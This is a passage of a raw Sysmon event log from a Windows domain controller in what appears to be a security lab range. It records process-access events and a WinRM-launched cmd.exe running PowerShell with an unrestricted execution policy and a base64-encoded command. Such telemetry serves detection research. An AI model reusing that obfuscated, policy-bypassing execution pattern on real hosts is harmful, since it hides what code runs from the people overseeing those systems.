MwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8E1D-6005-C302-00000000A201}48324960C:\Windows\system32\conhost.exe{59A5CD1D-8E1D-6005-C402-00000000A201}3288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E1D-6005-C402-00000000A201}3288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8E1D-6005-C202-00000000A201}12242484C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E1D-6005-C402-00000000A201}3288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x8000000000000000193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.475{59A5CD1D-8E1D-6005-C402-00000000A201}3288C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1D-6005-C64B-100000000000}0x104bc60HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E1D-6005-C202-00000000A201}1224C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.403{59A5CD1D-8CA9-6005-1300-00000000A201}12681244C:\Windows\system32\svchost.exe{59A5CD1D-8E1D-6005-C202-00000000A201}1224C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.387{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E1D-6005-C202-00000000A201}1224C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8E1D-6005-C302-00000000A201}48324960C:\Windows\system32\conhost.exe{59A5CD1D-8E1D-6005-C202-00000000A201}1224C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1D-6005-C302-00000000A201}4832C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.372{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\